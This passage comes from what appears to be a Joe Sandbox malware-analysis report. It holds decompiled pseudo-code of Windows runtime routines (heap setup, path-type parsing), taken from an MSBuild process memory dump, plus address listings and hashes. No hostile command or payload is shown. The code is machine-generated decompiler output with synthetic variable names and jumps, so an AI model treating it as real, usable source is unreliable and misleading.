                                            														}
                                            													}
                                            													__eflags =  *(_t528 - 0xb0);
                                            													if( *(_t528 - 0xb0) != 0) {
                                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                            														_t458 = 0xb;
                                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                            														E0104FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t505;
                                            														if(_t505 != 0) {
                                            															_t241 = _t505 + 4;
                                            															 *_t241 =  *(_t505 + 4) | 1;
                                            															__eflags =  *_t241;
                                            														}
                                            													}
                                            													_t328 =  *(_t528 + 0x1c);
                                            													__eflags = _t328;
                                            													if(_t328 == 0) {
                                            														L87:
                                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                            														_t455 =  *(_t528 - 0xdc);
                                            														 *(_t427 + 0x14) = _t455;
                                            														_t480 =  *(_t528 - 0xa0);
                                            														_t517 = 3;
                                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                            															asm("rdtsc");
                                            															 *(_t427 + 0x3c) = _t480;
                                            														} else {
                                            															 *(_t427 + 0x3c) = _t455;
                                            														}
                                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                            														_t456 =  *[fs:0x18];
                                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                            														_t427 = 0;
                                            														__eflags = 0;
                                            														_t511 = 0x18;
                                            														goto L91;
                                            													} else {
                                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                            														__eflags = _t519;
                                            														 *(_t528 - 0x8c) = _t328;
                                            														do {
                                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                            																_t334 =  *_t519;
                                            															} else {
                                            																_t334 = 0;
                                            															}
                                            															_t336 = _t334 & 0x000000ff;
                                            															__eflags = _t336;
                                            															_t427 =  *(_t528 - 0x88);
                                            															if(_t336 == 0) {
                                            																_t481 = _t479 + _t506;
                                            																__eflags = _t481;
                                            																 *(_t528 - 0x78) = _t481;
                                            																E0104F3E0(_t479 + _t427, _t457, _t506);
                                            																_t529 = _t529 + 0xc;
                                            															} else {
                                            																_t340 = _t336 - 1;
                                            																__eflags = _t340;
                                            																if(_t340 == 0) {
                                            																	E0104F3E0( *(_t528 - 0xb8), _t457, _t506);
                                            																	_t529 = _t529 + 0xc;
                                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                            																} else {
                                            																	__eflags = _t340 == 0;
                                            																	if(_t340 == 0) {
                                            																		__eflags = _t506 - 8;
                                            																		if(_t506 == 8) {
                                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            															_t339 = 0x10;
                                            															_t519 = _t519 + _t339;
                                            															_t263 = _t528 - 0x8c;
                                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                                            															__eflags =  *_t263;
                                            															_t479 =  *(_t528 - 0x78);
                                            														} while ( *_t263 != 0);
                                            														goto L87;
                                            													}
                                            												}
                                            											} else {
                                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                            												 *(_t528 - 0xa2) = _t392;
                                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                            												__eflags = _t469;
                                            												while(1) {
                                            													 *(_t528 - 0xe4) = _t511;
                                            													__eflags = _t392;
                                            													_t393 = _t427;
                                            													if(_t392 != 0) {
                                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                                            													}
                                            													_t395 = (_t393 & 0x000000ff) - _t427;
                                            													__eflags = _t395;
                                            													if(_t395 == 0) {
                                            														_t511 = _t511 +  *_t469;
                                            														__eflags = _t511;
                                            													} else {
                                            														_t398 = _t395 - 1;
                                            														__eflags = _t398;
                                            														if(_t398 == 0) {
                                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                            														} else {
                                            															__eflags = _t398 == 1;
                                            															if(_t398 == 1) {
                                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                            																_t402 =  *_t469 & 0x0000ffff;
                                            																 *(_t528 - 0xac) = _t402;
                                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                            															}
                                            														}
                                            													}
                                            													__eflags = _t511 -  *(_t528 - 0xe4);
                                            													if(_t511 <  *(_t528 - 0xe4)) {
                                            														break;
                                            													}
                                            													_t397 =  *(_t528 - 0x88) + 1;
                                            													 *(_t528 - 0x88) = _t397;
                                            													_t469 = _t469 + 0x10;
                                            													__eflags = _t397 -  *(_t528 + 0x1c);
                                            													_t392 =  *(_t528 - 0xa2);
                                            													if(_t397 <  *(_t528 + 0x1c)) {
                                            														continue;
                                            													}
                                            													goto L45;
                                            												}
                                            												_t475 = 0x216;
                                            												 *(_t528 - 0x74) = 0x216;
                                            												goto L45;
                                            											}
                                            										} else {
                                            											asm("lock dec dword [eax+ecx*8+0x4]");
                                            											goto L16;
                                            										}
                                            									}
                                            									_t491 = E010D4CAB(_t306, _t528 - 0xa4);
                                            									 *(_t528 - 0x74) = _t491;
                                            									__eflags = _t491;
                                            									if(_t491 != 0) {
                                            										goto L91;
                                            									} else {
                                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                            										goto L20;
                                            									}
                                            								}
                                            								L16:
                                            								 *(_t528 - 0x74) = 0x1069;
                                            								L93:
                                            								_t298 =  *(_t528 - 0xd0) + 1;
                                            								 *(_t528 - 0xd0) = _t298;
                                            								_t474 = _t474 + _t511;
                                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                            								_t494 = 4;
                                            								__eflags = _t298 - _t494;
                                            								if(_t298 >= _t494) {
                                            									goto L100;
                                            								}
                                            								_t494 =  *(_t528 - 0xcc);
                                            								_t435 = _t298;
                                            								continue;
                                            							}
                                            							__eflags = _t494[2] | _t494[3];
                                            							if((_t494[2] | _t494[3]) == 0) {
                                            								goto L15;
                                            							}
                                            							goto L12;
                                            						}
                                            						__eflags = _t301;
                                            						if(_t301 != 0) {
                                            							goto L92;
                                            						}
                                            						goto L10;
                                            						L92:
                                            						goto L93;
                                            					}
                                            				} else {
                                            					_push(0x57);
                                            					L101:
                                            					return E0105D130(_t427, _t494, _t511);
                                            				}
                                            			}

                                            0x010d5e2e
                                            0x010d5e36
                                            0x010d5e39
                                            0x010d5e42
                                            0x010d5e47
                                            0x010d5e4d
                                            0x010d5e54
                                            0x010d5e54
                                            0x010d5e54
                                            0x010d5e2e
                                            0x010d5e5c
                                            0x010d5e5f
                                            0x010d5e62
                                            0x010d5e64
                                            0x010d5e6b
                                            0x010d5e70
                                            0x010d5e7a
                                            0x010d5e7a
                                            0x010d5e7a
                                            0x010d5e6b
                                            0x010d5e7e
                                            0x010d5e7f
                                            0x010d5e7f
                                            0x010d5e81
                                            0x010d5e87
                                            0x010d5e8b
                                            0x010d5e8c
                                            0x010d5e8c
                                            0x010d5e8c
                                            0x010d5e9a
                                            0x010d5e9c
                                            0x010d5ea2
                                            0x010d5ea6
                                            0x010d5f50
                                            0x010d5f50
                                            0x010d5f57
                                            0x010d5f66
                                            0x010d5f66
                                            0x010d5f66
                                            0x010d5f68
                                            0x010d5f6a
                                            0x010d63d0
                                            0x00000000
                                            0x010d5f70
                                            0x010d5f70
                                            0x010d5f91
                                            0x010d5f9c
                                            0x010d5f9e
                                            0x010d5fa4
                                            0x010d5fa6
                                            0x010d638c
                                            0x010d6392
                                            0x010d63a1
                                            0x010d63a7
                                            0x010d63af
                                            0x010d63af
                                            0x010d63bd
                                            0x010d63d8
                                            0x00000000
                                            0x010d63d8
                                            0x010d5fac
                                            0x010d5fb2
                                            0x010d5fb4
                                            0x010d5fbd
                                            0x010d5fc6
                                            0x010d5fce
                                            0x010d5fd4
                                            0x010d5fdc
                                            0x010d5fec
                                            0x010d5fed
                                            0x010d5fee
                                            0x010d5fef
                                            0x010d5ff9
                                            0x010d5ffa
                                            0x010d5ffb
                                            0x010d5ffc
                                            0x010d6000
                                            0x010d6004
                                            0x010d6012
                                            0x010d6012
                                            0x010d6018
                                            0x010d6019
                                            0x010d601a
                                            0x010d601b
                                            0x010d601c
                                            0x010d6020
                                            0x010d6059
                                            0x010d605c
                                            0x010d6061
                                            0x010d6061
                                            0x010d6022
                                            0x010d6022
                                            0x010d6022
                                            0x010d6025
                                            0x010d602a
                                            0x010d602b
                                            0x010d6031
                                            0x010d6037
                                            0x010d6038
                                            0x010d603e
                                            0x010d6048
                                            0x010d6049
                                            0x010d604a
                                            0x010d604b
                                            0x010d604c
                                            0x010d604d
                                            0x010d6053
                                            0x010d6054
                                            0x010d6054
                                            0x010d6062
                                            0x010d6065
                                            0x010d6067
                                            0x010d606a
                                            0x010d6070
                                            0x010d6075
                                            0x010d6076
                                            0x010d6081
                                            0x010d6087
                                            0x010d6095
                                            0x010d6099
                                            0x010d609e
                                            0x010d60a4
                                            0x010d60ae
                                            0x010d60b0
                                            0x010d60b3
                                            0x010d60b6
                                            0x010d60b8
                                            0x010d60ba
                                            0x010d60ba
                                            0x010d60ba
                                            0x010d60ba
                                            0x010d60be
                                            0x010d60c0
                                            0x010d60c5
                                            0x010d60c5
                                            0x010d60c5
                                            0x010d60c6
                                            0x010d60cd
                                            0x010d6114
                                            0x010d60cf
                                            0x010d60cf
                                            0x010d60d4
                                            0x010d60d5
                                            0x010d60da
                                            0x010d60db
                                            0x010d60e1
                                            0x010d60e2
                                            0x010d60e8
                                            0x010d60f8
                                            0x010d60fd
                                            0x010d60fe
                                            0x010d6102
                                            0x010d6104
                                            0x010d6107
                                            0x010d6109
                                            0x010d610b
                                            0x010d610b
                                            0x010d610b
                                            0x010d610b
                                            0x010d610f
                                            0x010d610f
                                            0x010d6117
                                            0x010d611a
                                            0x010d611f
                                            0x010d6125
                                            0x010d6134
                                            0x010d6139
                                            0x010d613f
                                            0x010d6146
                                            0x010d6148
                                            0x010d614b
                                            0x010d614d
                                            0x010d614f
                                            0x010d614f
                                            0x010d614f
                                            0x010d614f
                                            0x010d6153
                                            0x010d6159
                                            0x010d6159
                                            0x010d615c
                                            0x010d6163
                                            0x010d6169
                                            0x010d616c
                                            0x010d6172
                                            0x010d6181
                                            0x010d6186
                                            0x010d6187
                                            0x010d618b
                                            0x010d6191
                                            0x010d6195
                                            0x010d61a3
                                            0x010d61bb
                                            0x010d61c0
                                            0x010d61c3
                                            0x010d61cc
                                            0x010d61d0
                                            0x010d61dc
                                            0x010d61de
                                            0x010d61e1
                                            0x010d61e4
                                            0x010d61e6
                                            0x010d61e8
                                            0x010d61e8
                                            0x010d61e8
                                            0x010d61e8
                                            0x010d61e6
                                            0x010d61ec
                                            0x010d61f3
                                            0x010d6203
                                            0x010d6209
                                            0x010d620a
                                            0x010d6216
                                            0x010d621d
                                            0x010d6227
                                            0x010d6241
                                            0x010d6246
                                            0x010d624c
                                            0x010d6257
                                            0x010d6259
                                            0x010d625c
                                            0x010d625e
                                            0x010d6260
                                            0x010d6260
                                            0x010d6260
                                            0x010d6260
                                            0x010d625e
                                            0x010d6264
                                            0x010d6267
                                            0x010d6269
                                            0x010d6315
                                            0x010d6315
                                            0x010d631b
                                            0x010d631e
                                            0x010d6324
                                            0x010d6327
                                            0x010d632f
                                            0x010d6330
                                            0x010d6333
                                            0x010d633a
                                            0x010d633c
                                            0x010d6335
                                            0x010d6335
                                            0x010d6335
                                            0x010d633f
                                            0x010d6342
                                            0x010d634c
                                            0x010d6352
                                            0x010d6355
                                            0x010d6355
                                            0x010d6359
                                            0x00000000
                                            0x010d626f
                                            0x010d6275
                                            0x010d6275
                                            0x010d6278
                                            0x010d627e
                                            0x010d627e
                                            0x010d6281
                                            0x010d6287
                                            0x010d628d
                                            0x010d6298
                                            0x010d629c
                                            0x010d62a2
                                            0x010d629e
                                            0x010d629e
                                            0x010d629e
                                            0x010d62a7
                                            0x010d62a7
                                            0x010d62aa
                                            0x010d62b0
                                            0x010d62f0
                                            0x010d62f0
                                            0x010d62f2
                                            0x010d62f8
                                            0x010d62fd
                                            0x010d62b2
                                            0x010d62b2
                                            0x010d62b2
                                            0x010d62b5
                                            0x010d62dd
                                            0x010d62e2
                                            0x010d62e5
                                            0x010d62b7
                                            0x010d62b8
                                            0x010d62bb
                                            0x010d62bd
                                            0x010d62c0
                                            0x010d62c4
                                            0x010d62cd
                                            0x010d62cd
                                            0x010d62c0
                                            0x010d62bb
                                            0x010d62b5
                                            0x010d6302
                                            0x010d6303
                                            0x010d6305
                                            0x010d6305
                                            0x010d6305
                                            0x010d630c
                                            0x010d630c
                                            0x00000000
                                            0x010d627e
                                            0x010d6269
                                            0x010d5eac
                                            0x010d5ebb
                                            0x010d5ebe
                                            0x010d5ecb
                                            0x010d5ecb
                                            0x010d5ece
                                            0x010d5ece
                                            0x010d5ed4
                                            0x010d5ed7
                                            0x010d5ed9
                                            0x010d5edb
                                            0x010d5edb
                                            0x010d5ee1
                                            0x010d5ee1
                                            0x010d5ee3
                                            0x010d5f20
                                            0x010d5f20
                                            0x010d5ee5
                                            0x010d5ee5
                                            0x010d5ee5
                                            0x010d5ee8
                                            0x010d5f11
                                            0x010d5f18
                                            0x010d5eea
                                            0x010d5eea
                                            0x010d5eed
                                            0x010d5ef2
                                            0x010d5ef8
                                            0x010d5efb
                                            0x010d5f0a
                                            0x010d5f0a
                                            0x010d5eed
                                            0x010d5ee8
                                            0x010d5f22
                                            0x010d5f28
                                            0x00000000
                                            0x00000000
                                            0x010d5f30
                                            0x010d5f31
                                            0x010d5f37
                                            0x010d5f3a
                                            0x010d5f3d
                                            0x010d5f44
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010d5f46
                                            0x010d5f48
                                            0x010d5f4d
                                            0x00000000
                                            0x010d5f4d
                                            0x010d5dda
                                            0x010d5ddf
                                            0x00000000
                                            0x010d5ddf
                                            0x010d5dd8
                                            0x010d5da7
                                            0x010d5da9
                                            0x010d5dac
                                            0x010d5dae
                                            0x00000000
                                            0x010d5db4
                                            0x010d5db4
                                            0x00000000
                                            0x010d5db4
                                            0x010d5dae
                                            0x010d5d88
                                            0x010d5d8d
                                            0x010d6363
                                            0x010d6369
                                            0x010d636a
                                            0x010d6370
                                            0x010d6372
                                            0x010d637a
                                            0x010d637b
                                            0x010d637d
                                            0x00000000
                                            0x00000000
                                            0x010d637f
                                            0x010d6385
                                            0x00000000
                                            0x010d6385
                                            0x010d5d38
                                            0x010d5d3b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010d5d3b
                                            0x010d5d27
                                            0x010d5d29
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010d6360
                                            0x00000000
                                            0x010d6360
                                            0x010d5c10
                                            0x010d5c10
                                            0x010d63da
                                            0x010d63e5
                                            0x010d63e5

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7cc180246a42be342de7d80e17c73ea51f28c9b4482ddc8507a3e51d3346dbd
                                            • Instruction ID: 9e40636c31cea1ccc2861869785432ad9f47f81d3b205445f2b4b2363e2a756c
                                            • Opcode Fuzzy Hash: a7cc180246a42be342de7d80e17c73ea51f28c9b4482ddc8507a3e51d3346dbd
                                            • Instruction Fuzzy Hash: 074238759003298FDB64CF68C881BAABBF1FF49304F1481EAD98DAB242D7759985CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E01024120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                            				signed int _v8;
                                            				void* _v20;
                                            				signed int _v24;
                                            				char _v532;
                                            				char _v540;
                                            				signed short _v544;
                                            				signed int _v548;
                                            				signed short* _v552;
                                            				signed short _v556;
                                            				signed short* _v560;
                                            				signed short* _v564;
                                            				signed short* _v568;
                                            				void* _v570;
                                            				signed short* _v572;
                                            				signed short _v576;
                                            				signed int _v580;
                                            				char _v581;
                                            				void* _v584;
                                            				unsigned int _v588;
                                            				signed short* _v592;
                                            				void* _v597;
                                            				void* _v600;
                                            				void* _v604;
                                            				void* _v609;
                                            				void* _v616;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				unsigned int _t161;
                                            				signed int _t162;
                                            				unsigned int _t163;
                                            				void* _t169;
                                            				signed short _t173;
                                            				signed short _t177;
                                            				signed short _t181;
                                            				unsigned int _t182;
                                            				signed int _t185;
                                            				signed int _t213;
                                            				signed int _t225;
                                            				short _t233;
                                            				signed char _t234;
                                            				signed int _t242;
                                            				signed int _t243;
                                            				signed int _t244;
                                            				signed int _t245;
                                            				signed int _t250;
                                            				void* _t251;
                                            				signed short* _t254;
                                            				void* _t255;
                                            				signed int _t256;
                                            				void* _t257;
                                            				signed short* _t260;
                                            				signed short _t265;
                                            				signed short* _t269;
                                            				signed short _t271;
                                            				signed short** _t272;
                                            				signed short* _t275;
                                            				signed short _t282;
                                            				signed short _t283;
                                            				signed short _t290;
                                            				signed short _t299;
                                            				signed short _t307;
                                            				signed int _t308;
                                            				signed short _t311;
                                            				signed short* _t315;
                                            				signed short _t316;
                                            				void* _t317;
                                            				void* _t319;
                                            				signed short* _t321;
                                            				void* _t322;
                                            				void* _t323;
                                            				unsigned int _t324;
                                            				signed int _t325;
                                            				void* _t326;
                                            				signed int _t327;
                                            				signed int _t329;
                                            
                                            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                            				_v8 =  *0x10fd360 ^ _t329;
                                            				_t157 = _a8;
                                            				_t321 = _a4;
                                            				_t315 = __edx;
                                            				_v548 = __ecx;
                                            				_t305 = _a20;
                                            				_v560 = _a12;
                                            				_t260 = _a16;
                                            				_v564 = __edx;
                                            				_v580 = _a8;
                                            				_v572 = _t260;
                                            				_v544 = _a20;
                                            				if( *__edx <= 8) {
                                            					L3:
                                            					if(_t260 != 0) {
                                            						 *_t260 = 0;
                                            					}
                                            					_t254 =  &_v532;
                                            					_v588 = 0x208;
                                            					if((_v548 & 0x00000001) != 0) {
                                            						_v556 =  *_t315;
                                            						_v552 = _t315[2];
                                            						_t161 = E0103F232( &_v556);
                                            						_t316 = _v556;
                                            						_v540 = _t161;
                                            						goto L17;
                                            					} else {
                                            						_t306 = 0x208;
                                            						_t298 = _t315;
                                            						_t316 = E01026E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                            						if(_t316 == 0) {
                                            							L68:
                                            							_t322 = 0xc0000033;
                                            							goto L39;
                                            						} else {
                                            							while(_v581 == 0) {
                                            								_t233 = _v588;
                                            								if(_t316 > _t233) {
                                            									_t234 = _v548;
                                            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                            										_t254 = L01024620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                            										if(_t254 == 0) {
                                            											_t169 = 0xc0000017;
                                            										} else {
                                            											_t298 = _v564;
                                            											_v588 = _t316;
                                            											_t306 = _t316;
                                            											_t316 = E01026E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                            											if(_t316 != 0) {
                                            												continue;
                                            											} else {
                                            												goto L68;
                                            											}
                                            										}
                                            									} else {
                                            										goto L90;
                                            									}
                                            								} else {
                                            									_v556 = _t316;
                                            									 *((short*)(_t329 + 0x32)) = _t233;
                                            									_v552 = _t254;
                                            									if(_t316 < 2) {
                                            										L11:
                                            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                            											_t161 = 5;
                                            										} else {
                                            											if(_t316 < 6) {
                                            												L87:
                                            												_t161 = 3;
                                            											} else {
                                            												_t242 = _t254[2] & 0x0000ffff;
                                            												if(_t242 != 0x5c) {
                                            													if(_t242 == 0x2f) {
                                            														goto L16;
                                            													} else {
                                            														goto L87;
                                            													}
                                            													goto L101;
                                            												} else {
                                            													L16:
                                            													_t161 = 2;
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										_t243 =  *_t254 & 0x0000ffff;
                                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                                            											if(_t316 < 4) {
                                            												L81:
                                            												_t161 = 4;
                                            												goto L17;
                                            											} else {
                                            												_t244 = _t254[1] & 0x0000ffff;
                                            												if(_t244 != 0x5c) {
                                            													if(_t244 == 0x2f) {
                                            														goto L60;
                                            													} else {
                                            														goto L81;
                                            													}
                                            												} else {
                                            													L60:
                                            													if(_t316 < 6) {
                                            														L83:
                                            														_t161 = 1;
                                            														goto L17;
                                            													} else {
                                            														_t245 = _t254[2] & 0x0000ffff;
                                            														if(_t245 != 0x2e) {
                                            															if(_t245 == 0x3f) {
                                            																goto L62;
                                            															} else {
                                            																goto L83;
                                            															}
                                            														} else {
                                            															L62:
                                            															if(_t316 < 8) {
                                            																L85:
                                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                            																goto L17;
                                            															} else {
                                            																_t250 = _t254[3] & 0x0000ffff;
                                            																if(_t250 != 0x5c) {
                                            																	if(_t250 == 0x2f) {
                                            																		goto L64;
                                            																	} else {
                                            																		goto L85;
                                            																	}
                                            																} else {
                                            																	L64:
                                            																	_t161 = 6;
                                            																	goto L17;
                                            																}
                                            															}
                                            														}
                                            													}
                                            												}
                                            											}
                                            											goto L101;
                                            										} else {
                                            											goto L11;
                                            										}
                                            									}
                                            									L17:
                                            									if(_t161 != 2) {
                                            										_t162 = _t161 - 1;
                                            										if(_t162 > 5) {
                                            											goto L18;
                                            										} else {
                                            											switch( *((intOrPtr*)(_t162 * 4 +  &M010245F8))) {
                                            												case 0:
                                            													_v568 = 0xfe1078;
                                            													__eax = 2;
                                            													goto L20;
                                            												case 1:
                                            													goto L18;
                                            												case 2:
                                            													_t163 = 4;
                                            													goto L19;
                                            											}
                                            										}
                                            										goto L41;
                                            									} else {
                                            										L18:
                                            										_t163 = 0;
                                            										L19:
                                            										_v568 = 0xfe11c4;
                                            									}
                                            									L20:
                                            									_v588 = _t163;
                                            									_v564 = _t163 + _t163;
                                            									_t306 =  *_v568 & 0x0000ffff;
                                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                            									_v576 = _t265;
                                            									if(_t265 > 0xfffe) {
                                            										L90:
                                            										_t322 = 0xc0000106;
                                            									} else {
                                            										if(_t321 != 0) {
                                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                            												if(_v580 != 0) {
                                            													goto L23;
                                            												} else {
                                            													_t322 = 0xc0000106;
                                            													goto L39;
                                            												}
                                            											} else {
                                            												_t177 = _t306;
                                            												goto L25;
                                            											}
                                            											goto L101;
                                            										} else {
                                            											if(_v580 == _t321) {
                                            												_t322 = 0xc000000d;
                                            											} else {
                                            												L23:
                                            												_t173 = L01024620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                            												_t269 = _v592;
                                            												_t269[2] = _t173;
                                            												if(_t173 == 0) {
                                            													_t322 = 0xc0000017;
                                            												} else {
                                            													_t316 = _v556;
                                            													 *_t269 = 0;
                                            													_t321 = _t269;
                                            													_t269[1] = _v576;
                                            													_t177 =  *_v568 & 0x0000ffff;
                                            													L25:
                                            													_v580 = _t177;
                                            													if(_t177 == 0) {
                                            														L29:
                                            														_t307 =  *_t321 & 0x0000ffff;
                                            													} else {
                                            														_t290 =  *_t321 & 0x0000ffff;
                                            														_v576 = _t290;
                                            														_t310 = _t177 & 0x0000ffff;
                                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                            															_t307 =  *_t321 & 0xffff;
                                            														} else {
                                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                            															E0104F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                            															_t329 = _t329 + 0xc;
                                            															_t311 = _v580;
                                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                            															 *_t321 = _t225;
                                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                            															}
                                            															goto L29;
                                            														}
                                            													}
                                            													_t271 = _v556 - _v588 + _v588;
                                            													_v580 = _t307;
                                            													_v576 = _t271;
                                            													if(_t271 != 0) {
                                            														_t308 = _t271 & 0x0000ffff;
                                            														_v588 = _t308;
                                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                            															E0104F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                            															_t329 = _t329 + 0xc;
                                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                            															 *_t321 = _t213;
                                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                            															}
                                            														}
                                            													}
                                            													_t272 = _v560;
                                            													if(_t272 != 0) {
                                            														 *_t272 = _t321;
                                            													}
                                            													_t306 = 0;
                                            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                            													_t275 = _v572;
                                            													if(_t275 != 0) {
                                            														_t306 =  *_t275;
                                            														if(_t306 != 0) {
                                            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                            														}
                                            													}
                                            													_t181 = _v544;
                                            													if(_t181 != 0) {
                                            														 *_t181 = 0;
                                            														 *((intOrPtr*)(_t181 + 4)) = 0;
                                            														 *((intOrPtr*)(_t181 + 8)) = 0;
                                            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                            														if(_v540 == 5) {
                                            															_t182 = E010052A5(1);
                                            															_v588 = _t182;
                                            															if(_t182 == 0) {
                                            																E0101EB70(1, 0x10f79a0);
                                            																goto L38;
                                            															} else {
                                            																_v560 = _t182 + 0xc;
                                            																_t185 = E0101AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                            																if(_t185 == 0) {
                                            																	_t324 = _v588;
                                            																	goto L97;
                                            																} else {
                                            																	_t306 = _v544;
                                            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                            																	 *(_t306 + 4) = _t282;
                                            																	_v576 = _t282;
                                            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                            																	 *_t306 = _t325;
                                            																	if( *_t282 == 0x5c) {
                                            																		_t149 = _t325 - 2; // -2
                                            																		_t283 = _t149;
                                            																		 *_t306 = _t283;
                                            																		 *(_t306 + 4) = _v576 + 2;
                                            																		_t185 = _t283 & 0x0000ffff;
                                            																	}
                                            																	_t324 = _v588;
                                            																	 *(_t306 + 2) = _t185;
                                            																	if((_v548 & 0x00000002) == 0) {
                                            																		L97:
                                            																		asm("lock xadd [esi], eax");
                                            																		if((_t185 | 0xffffffff) == 0) {
                                            																			_push( *((intOrPtr*)(_t324 + 4)));
                                            																			E010495D0();
                                            																			L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                            																		}
                                            																	} else {
                                            																		 *(_t306 + 0xc) = _t324;
                                            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                            																	}
                                            																	goto L38;
                                            																}
                                            															}
                                            															goto L41;
                                            														}
                                            													}
                                            													L38:
                                            													_t322 = 0;
                                            												}
                                            											}
                                            										}
                                            									}
                                            									L39:
                                            									if(_t254 !=  &_v532) {
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                            									}
                                            									_t169 = _t322;
                                            								}
                                            								goto L41;
                                            							}
                                            							goto L68;
                                            						}
                                            					}
                                            					L41:
                                            					_pop(_t317);
                                            					_pop(_t323);
                                            					_pop(_t255);
                                            					return E0104B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                            				} else {
                                            					_t299 = __edx[2];
                                            					if( *_t299 == 0x5c) {
                                            						_t256 =  *(_t299 + 2) & 0x0000ffff;
